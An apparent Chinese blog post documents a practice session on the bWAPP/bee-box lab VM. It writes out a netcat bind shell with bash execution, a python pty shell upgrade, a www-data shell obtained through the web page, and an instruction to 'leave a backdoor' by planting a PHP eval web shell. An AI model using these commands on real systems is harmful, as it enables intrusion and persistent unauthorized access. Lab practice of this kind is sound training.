用nc反弹shell真有意思哈哈
程序员文章站
2022-07-15 11:13:38
...
先在bee(192.168.170.130)上面
aaa@qq.com:/tmp$ nc -vlp 4444 -e /bin/bash
listening on [any] 4444 ...
192.168.170.1: inverse host lookup failed: Unknown host
connect to [192.168.170.130] from (UNKNOWN) [192.168.170.1] 51226
然后在自己机器(192.168.170.1)上
➜ exploit/others master ✓ nc 192.168.170.130 4444 [14:07:23]
这个时候在bee上,用netstat -plant
应该可以已经看到TCP连接已经建立了。
tcp 0 0 192.168.170.130:4444 192.168.170.1:51434 ESTABLISHED
然后继续,暂时只是一个没有命令提示符的shell,可以用python来得到一个有交互式的shell。
id
uid=1000(bee) gid=1000(bee) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),125(sambashare),1000(bee)
python -c "import pty; pty.spawn('/bin/bash')"
bee@bee-box:/tmp$
bee@bee-box:/tmp$ pwd
pwd
/tmp
bee@bee-box:/tmp$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:82:c4:aa
inet addr:192.168.170.130 Bcast:192.168.170.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe82:c4aa/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:27851 errors:24921 dropped:0 overruns:0 frame:0
TX packets:21029 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3201942 (3.0 MB) TX bytes:6392437 (6.0 MB)
Interrupt:16 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1006 errors:0 dropped:0 overruns:0 frame:0
TX packets:1006 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:77917 (76.0 KB) TX bytes:77917 (76.0 KB)
bee@bee-box:/tmp$
bee@bee-box:/tmp$ echo "caiqiqi"
echo "caiqiqi"
caiqiqi
在这个nc反弹回来的shell里面,输入echo "caiqiqi"
然后用wireshark抓包,follow TCP stream。由于是nc,所以并不是ssh加密的,是没有加密的TCP流量
。得到这么几个包。
当在web页面上使用nc -vlp 4444 -e /bin/bash
时,得到的是www-data
用户的shell。
注意:如果你输入ifconfig
,可能并没有回显,这可能是www-data
用户的环境变量里没有/sbin
的缘故,如果你有带命令提示符的shell的话,它会给你提示错误,否则可能什么响应都没有,你以为你已经断开shell了呢,其实没有。
www-data@bee-box:/var/www/bWAPP$ ifconfig
ifconfig
Command 'ifconfig' is available in '/sbin/ifconfig'
The command could not be located because '/sbin' is not included in the PATH environment variable.
This is most likely caused by the lack of administrative priviledges associated with your user account.
bash: ifconfig: command not found
www-data@bee-box:/var/www/bWAPP$ echo $PATH
echo $PATH
/usr/local/bin:/usr/bin:/bin
最后记得留下后门。
aaa@qq.com:/var/www/bWAPP$ echo "<?php eval($_GET['x']);?>" > x.php
echo "<?php eval($_GET['x']);?>" > x.php
然而在我之后在正常的shell中却发现那个后门的内容并不是我之前输入的那样,
aaa@qq.com:/var/www/bWAPP$ cat x.php
<?php eval(['x']);?>
页面也报错了
推荐阅读